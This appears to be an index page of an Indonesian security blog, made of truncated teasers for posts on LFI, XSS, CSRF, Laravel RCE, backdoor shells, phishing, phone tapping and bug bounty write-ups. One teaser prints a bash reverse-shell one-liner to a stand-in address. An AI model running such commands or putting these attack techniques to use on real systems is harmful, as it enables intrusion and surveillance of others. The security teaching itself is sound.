Setelah lama istirahat dari aktivitas hacking dan fokus nge wibu, beberapa waktu lalu nakanosec mendapat pengalaman yang menarik untuk ditulis di s…
Local File Inclusion atau LFI adalah kerentanan / vulnerability yang umum ditemukan pada aplikasi web. Kerentanan ini memungkinkan penyerang/at…
Firebase adalah Realtime database yang dikembangkan oleh google dimana seringkali penggunaannya digunakan pada aplikasi mobile, namun ada juga p…
Setelah beberapa waktu berburu di program bugbounty saya mencoba untuk berburu di alam liar menggunakan dorking untuk mencari program yang menjalank…
Melakukan remote xss adalah hal yang mungkin dimana attacker dapat mengendalikan payload yang sudah dieksekusi atau ditanam. Bagaimana cara kerja exp…
XSS enables attackers to inject client-side scripts into web pages viewed by other users may can be lead to cookie stealing. Sometimes we had vul…
Content Security Policy adalah header yang biasa digunakan untuk mengkonfigurasi laman web dimana kita dapat membuat aturan aturan tertentu yang dapa…
Broken link sendiri adalah sebuah link pada halaman website yang dimana jika diklik tidak ditemukan, link error, atau 404 not found pada browser. …
Beberapa hari belakangan ini banyak beredar tentang exploit laravel RCE dimana pada bug ini memanfaatkan APP_Key yang bisa kita dapat dari .env at…
Beberapa waktu yang lalu saya melaporkan kerentanan pada situs social media dimana situs ini memikiki kerentanan Metadata Disclosure. Metadata Disc…
Oke, Gua gatau gimana bikin kalimat pembuka, yaudahlah kalimat pembukanya ngasal aja yah... Jadi pas gua ada praktikum instrumen kendali dimana ma…
Discord adalah aplikasi VoIP freeware eksklusif dan platform distribusi digital yang dirancang untuk komunitas permainan video, yang berspesialisasi…
Diambil dari sebuah thread pada grup IndoXploit dimana ketika melakukan RCE mendapatkan Error dengan HTTP ERROR CODE 500 ada beberapa teknik untuk m…
Sebelumnya mau cerita dikit case pada saat saya ingin melakukan backconnect atau Reverse Shell pada Windows Server. Pada kasus ini saya memiliki masa…
Umm,,, Karna beberapa alasan nakanosec tidak bisa update dalam beberapa minggu ini, Tapi hari ini kita dah comeback lagi.. Hari ini kita bakalan bah…
Kali ini nakanosec bakalan bahas tentang cara menggunakan cookie untuk login, artikel ini ditujukan buat temen temen yang belom paham penggunak…
Shell Backdoor adalah file yang ditanamkan oleh attacker ke server pada aktivitas hacking. Biasanya shell backdoor dibuat dengan format php atau a…
CSRF adalah singkatan dari Cross-site request forgery , Kerentanan ini memanfaatkan sesi yang ada tanpa perlindungan token csrf sebagai seranga…
Hello kenalin gua Salman aka Chiper, Dikesempatan kali ini gua bikin write up bounty pertama gua. Cerita tentang gimana caranya bikin report yan…
Host Header Injection adalah kerentanan yang memanfaatkan perubahan host pada request header situs web atau aplikasi web mana yang harus memproses…
Pengertian XSS (Cross Site Scripting) merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang d…
Di Episode Ke 3 Mr.robot menggunakan teknik phising untuk melakukan serangan social engineering. Mr robot melakukan clone dan menyisipkan logger di…
Mungkin sudah banyak yang tau atau yang punya tools untuk scanning IP user yang satu jaringan. Walaupun sudah basi tapi tidak ada salahnya untuk be…
Reverse Shell dengan Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Reverse Shell dengan PERL perl -e 'use Socket;$i="…
Shellshock adalah kerentanan yang ditemukan pada sistem operasi linux pada tahun 2014 (CVE-2014-6271). Shellshock sendiri memanfaatkan kerentan…
Kumpulan Http Status Code: 100 Continue 206 Partial Content 403 Forbidden 300 Multiple Choices 101 Switching Protocols 200 OK 302 Moved Te…
Wordlis t adalah kumpulan banyak kata dalam satu file. Biasanya wordlist sendiri digunakan untuk melakukan bruteforce. Tapi sebanyak apapun word…
Directory Listing (Dirlisting) adalah fungsi server web yang menampilkan daftar semua file ketika tidak ada file indeks, seperti index.php, index…
Mungkin Anda pernah mengalami website yang anda kelola tiba tiba di deface atau diretas oleh seseorang. Perubahan tampilan website dirubah dengan pe…
Clickjacking (User Interface redress attack) adalah teknik jahat untuk menipu pengguna agar mengklik sesuatu yang berbeda dari apa yang dilihat p…
Apa Kalian Mencari teknik bypass 500 Internal Server Error? Ketika Mau Retriv db (enumerate Database) Muncul Error Kode 500
Banyak banget orang yang nanya gimana cara buat nyadap hape atau gadget android.. disini semua yang saya tulis real sesuai apa yang pernah lakuin.…
Karna banyaknya pertanyaan pada postikan di fanspage nakanosec tentang open redirect kali ini kita bakal belajar tentang bug open redirect dan peny…
Session Puzzling adalah kerentanan tingkat aplikasi yang terjadi ketika variabel session aplikasi menggunakan lebih dari satu tujuan. Nama lain da…
Regular Expression (REGEX) adalah konstruksi bahasa untuk mencocokkan teks berdasarkan pola tertentu, terutama untuk kasus-kasus kompleks. Contoh…
PHP Code Injection adalah kerentanan/kelemahan pada sebuah website yang memungkinkan penyerang untuk menyisipkan kode khusus ke dalam mesin scrip…
Artikel kali ini akan membahas serangan pixel flood dan frame flood attack, ini termasuk serangan Denial of service. Apa itu Pixel Flood dan Frame…
Kali ini saya akan membahas tentang source code yang tidak tertutup yang bisa mengakitbatkan terdapat file file yang tidak diinginkan terlihat. Mohon…
Tabnabbing adalah teknik serangan eksploit sejenis phishing, yang membujuk pengguna untuk mengirimkan detail login dan kata sandi mereka ke situs we…
Common Bug adalah bug yang paling sering ditemukan pada perangkat keras atau perangkat lunak yang mengakibatkan terjadinya galat pada peralatan…